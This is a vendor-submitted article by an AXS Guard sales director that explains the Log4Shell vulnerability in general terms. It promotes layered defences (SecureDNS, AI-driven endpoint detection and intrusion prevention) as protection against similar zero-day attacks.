With these three solutions, you’ll be better protected against similar zero-day vulnerabilities
A serious vulnerability in a widely used open-source library for Java has been putting the global IT landscape on edge since early December 2021.
What exactly was and is going on?
Log4Shell is a zero-day vulnerability that affects the popular Apache package Log4j (published as CVE-2021-44228 as of Dec. 9, 2021). Using special requests, attackers gain control over devices or computers running certain versions of Log4j. The Apache Software Foundation, which maintains the Log4j 2 library, gave this vulnerability a CVSS score of 10 out of 10, the highest score regarding the severity of the vulnerability.
Are you along for the ride? Or late?
In the meantime, fortunately, several successive patches have been released and, of course, it is always advisable to install them immediately. But then, unfortunately, you are not there yet….
Do you know if and where Log4j is being used in your organization?
Dan Verbruggen, Sales & Marketing Director at AXS Guard
In fact, there are some other issues you need to address. Do you know if and where Log4j is being used in your organization? Have you or the manufacturer patched everything with the very latest version?
And perhaps the most important question, aren’t you already too late? Hackers these days are known to take their time and quietly monitor their “targets” for several weeks and dig deeper into the organization before unleashing their ransomware and holding the company hostage.
Hacked, but you don’t know it yet?
Therefore, it is recommended to implement some other solutions that will guarantee you better security and at least detect if any unauthorized actions are going on. After all, if you have been hacked and you don’t know it, you won’t be able to do anything about it either. Alex Ongena, CEO of Belgian AXS Guard advises, “By thinking in cyber security layers, you are better protected as an enterprise against similar zero-day attacks. Each layer makes it harder to exploit vulnerabilities undetected, and new technologies with AI are making that increasingly difficult.”
Activate SecureDNS to block malicious domains quickly and automatically
All communications, including those of attackers and malware use DNS, a protocol that allows computers to figure out which IP address belongs to a particular host or domain.
Through a SecureDNS service, all DNS requests are checked against special databases and suspicious and malicious domains are immediately identified and blocked.
Vulnerabilities like Log4shell behave no differently in this regard. When the Log4j application is attacked, it will force the target to “dial back” to a particular URL. An attacker can then abuse that URL to pass certain commands that are then executed on the vulnerable computer.
Because the domains and IP addresses in these callback URLs are malicious, they are immediately recognized and blocked by SecureDNS, ultimately causing the attack to fail.
Detecting abnormal activity with AI and Endpoint Security (EDR)
Endpoint Detection & Response or EDR is a very small application, called an agent, that is installed on any device in your organization (such as computer, laptop, server, mobile) and provides full visibility on your IT infrastructure through its central management interface.
Log4j is a globally used application. Given the simplicity of the exploit, it unfortunately enables large-scale attacks.
Dan Verbruggen, Sales & Marketing Director at AXS Guard
It works in real time and includes a series of advanced techniques to quickly detect and stop all abnormal activity. So also the Log4Shell vulnerability. Because it uses the Log4j Java Naming and Directory Interface (JNDI). This allows initiating requests to a malicious server managed by an attacker on the Internet.
Log4j is a globally used application. Given the simplicity of the exploit, it unfortunately makes large-scale attacks possible. Although the exploit is simple to execute on its own, additional steps are required for the attacker to gain a foothold.
A.I. Driven Endpoint Security, such as ReaQta’s EDR at AXS Guard, provides insight into unexpected application behavior, such as Log4j, and automatically blocks any unusual activity that occurs during a post-exploitation phase of a cyberattack.
Intrustion Prevention System
Intrusion Prevention System (IPS) is a system that focuses on prevention. The system identifies potential vulnerabilities and takes immediate action when an attack occurs.
In fact, IPS uses existing preprocessors and a set of dynamic rules that are automatically updated. These rules are divided into classes. To protect your network from Log4Shell at the IPS level, simply activate these specific rules in your IPS system on your firewall and then monitor via the reporting tool which attacks are being blocked.
Internet security is thus thinking in layers
The hacker uses more than one system, combining various technologies. Therefore, it is also necessary to build your defense in several layers.
The hacker uses more than one system, combining various technologies.
Dan Verbruggen, Sales & Marketing Director at AXS Guard
In addition to immediately installing all the patches offered by the various manufacturers, it is necessary to remain alert and, above all, to act preventively. Besides automatically monitoring all Internet traffic at the DNS level with SecureDNS, monitoring abnormal behavior on all computers and servers via Endpoint Security is also a must. Intrusion prevention finally, is going to stop attacks and report what happened.
That this is a complex story is obvious. Large companies have the people and resources to secure themselves. For SMBs, systems like AXS Guard firewall, with the various technologies built in and working together are a better choice. You then suddenly have all the tools to apply a uniform, affordable and manageable security policy, in layers.
This is a submitted contribution from Dan Verbruggen, Sales & Marketing Director at AXS Guard. For more information on the company’s security solutions, please visit here.